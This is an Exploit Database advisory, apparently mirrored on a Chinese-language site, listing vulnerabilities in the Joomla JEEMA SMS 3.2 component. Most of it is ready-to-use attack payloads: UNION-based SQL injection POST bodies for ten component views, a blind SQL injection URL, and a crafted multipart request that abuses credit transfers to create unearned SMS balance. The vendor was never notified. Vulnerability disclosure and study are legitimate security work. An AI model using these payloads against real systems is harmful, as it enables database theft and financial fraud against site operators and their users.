Joomla! Component com_jeemasms 3.2 – Multiple Vulnerabilities

• Exploit Database
• 51 阅读

• 作者： Chris Russell
  日期： 2011-10-29
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/18047/

• ###################################################################
  JEEMA SMS 3.2 Component Joomla Multiple Vulnerabilities
  ###################################################################
  
  Release Date Bug.28-Oct-2011
  Date Added.30-January-2010
  Vendor Notification Date.Never
  Product. JEEMA SMS
  Platform.Joomla
  Affected versions. 3.2
  Type.Commercial
  Price. $115.00
  Attack Vector. Multiple
  Solution Status. unpublished
  CVE reference. Not yet assigned
  Download.http://www.shopping.jeema.net/index.php?main_page=product_info&cPath=1&products_id=2&zenid=dc8442eed192c973fe776f9cd16a1a6c
  
  
  I. BACKGROUND
  
  JEEMA SMS is a Joomla 1.5 component which can be installed inside Joomla.
  The main purpose of this component is to configure any HTTP SMS API and you
  can start sending SMS. This component can be used as a reseller account.
  I.e) If you buy 10,000 SMS from a SMS provider and you can partition these 10,000
  SMS to distrubute among the members. 
  
  II. DESCRIPTION
  
  vulnerabilities are SQL injection, blind SQL injection, and message transfer credit
  
  
  III.EXPLOITATION
  
  For the operation must first register
  
  
  
  SQL INJECTION
  ::::::::::::::::::::::::::::::::::::::::
  
  
  //index.php?option=com_jeemasms&view=book&Itemid=2
  
  Post:
  filter_subsearch=') AND 1=2 UNION SELECT 1,2,3,4,5,6,7,8,9,10#&alias%5B1%5D=4-1&limit=20&limitstart=0&option=com_jeemasms&task=&view=book&boxchecked=&controller=&groupid=&sendfrom=book&filter_order=&filter_order_Dir=
  ---
  //index.php?option=com_jeemasms&view=group&Itemid=3
  
  Post:
  filter_subsearch=') AND 1=2 UNION SELECT 1,2,3,4,5,6,7#&limit=20&limitstart=0&option=com_jeemasms&task=&view=group&boxchecked=&controller=&sendfrom=group&filter_order=&filter_order_Dir=
  --
  //index.php?option=com_jeemasms&view=history&Itemid=4
  
  Post:
  filter_subsearch=') AND 1=2 UNION SELECT 1,2,3,4,5,6,7#&limit=20&limitstart=0&option=com_jeemasms&task=&view=history&boxchecked=&controller=&sendfrom=history&filter_order=&filter_order_Dir=
  ----
  //index.php?option=com_jeemasms&view=sender&Itemid=7
  
  Post:
  filter_subsearch=') AND 1=2 UNION SELECT 1,2,3,4,5#&limit=20&limitstart=0&option=com_jeemasms&task=&view=sender&boxchecked=&controller=&filter_order=&filter_order_Dir=
  ---
  //index.php?option=com_jeemasms&view=keyword&Itemid=11
  
  Post:
  filter_subsearch=') AND 1=2 UNION SELECT 1,2,3,4,5#&limit=20&limitstart=0&option=com_jeemasms&task=&view=keyword&boxchecked=&controller=&filter_order=&filter_order_Dir=
  ---
  //index.php?option=com_jeemasms&view=smstemplate&Itemid=13
  
  Post:
  filter_subsearch=') AND 1=2 UNION SELECT 1,2,3,4,5#&limit=20&limitstart=0&option=com_jeemasms&task=&view=smstemplate&boxchecked=&controller=&filter_order=&filter_order_Dir=
  --
  //index.php?option=com_jeemasms&view=csvsms&Itemid=14
  
  Post:
  filter_subsearch=') AND 1=2 UNION SELECT 1,2,3,4,5#&limit=20&limitstart=0&option=com_jeemasms&task=&view=smstemplate&boxchecked=&controller=&filter_order=&filter_order_Dir=
  --
  //index.php?option=com_jeemasms&view=invoice&Itemid=15
  
  Post:
  filter_subsearch=') AND 1=2 UNION SELECT 1,2,3,4,5#&limit=20&limitstart=0&option=com_jeemasms&task=&view=smstemplate&boxchecked=&controller=&filter_order=&filter_order_Dir=
  --
  //sms/index.php?option=com_jeemasms&view=smsschedule&Itemid=16
  
  Post:
  filter_subsearch=') AND 1=2 UNION SELECT 1,2,3,4,5#&limit=20&limitstart=0&option=com_jeemasms&task=&view=smstemplate&boxchecked=&controller=&filter_order=&filter_order_Dir=
  --
  //sms/index.php?option=com_jeemasms&view=senderrequest&Itemid=18
  
  Post:
  filter_subsearch=') AND 1=2 UNION SELECT 1,2,3,4,5#&limit=20&limitstart=0&option=com_jeemasms&task=&view=smstemplate&boxchecked=&controller=&filter_order=&filter_order_Dir=
  
  
  BLIND SQL INJECTION
  ::::::::::::::::::::::::::::::::::::::::
  
  
  //index.php?option=com_jeemasms&view=groupsubscribe&task=groupsubscribe&Itemid=10&groupid=1+and+substring%28@@version,1,1%29=4
  
  
  
  MESSAGE TRANSFER CREDIT
  ::::::::::::::::::::::::::::::
  
  //index.php?option=com_jeemasms&view=transfercredit&Itemid=17
  
  -----------------------------236921977120363\r\n
  Content-Disposition: form-data; name="memberid"\r\n
  \r\n
  383\r\n
  -----------------------------236921977120363\r\n
  Content-Disposition: form-data; name="transfercredits"\r\n
  \r\n
  10000000000000000000000000\r\n
  -----------------------------236921977120363\r\n
  Content-Disposition: form-data; name="acc_id"\r\n
  \r\n
  3\r\n
  -----------------------------236921977120363\r\n
  Content-Disposition: form-data; name="option"\r\n
  \r\n
  com_jeemasms\r\n
  -----------------------------236921977120363\r\n
  Content-Disposition: form-data; name="task"\r\n
  \r\n
  transfercredit\r\n
  -----------------------------236921977120363\r\n
  Content-Disposition: form-data; name="view"\r\n
  \r\n
  transfercredit\r\n
  -----------------------------236921977120363\r\n
  Content-Disposition: form-data; name="boxchecked"\r\n
  \r\n
  \r\n
  -----------------------------236921977120363\r\n
  Content-Disposition: form-data; name="controller"\r\n
  \r\n
  \r\n
  -----------------------------236921977120363--\r\n
  
  EXPLANATION
  
  -----------------------------236921977120363\r\n
  Content-Disposition: form-data; name="memberid"\r\n
  \r\n
  383\r\n
  -----------------------------236921977120363\r\n
  Content-Disposition: form-data; name="transfercredits"\r\n
  \r\n
  10000000000000000000000000\r\n
  
  name="memberid" ID a transfer
  name="transfercredits" Credit to transfer when passing on the balance will be negative so you can achieve the balance you want :).
  
  
  Discovered by.
  Chris Russell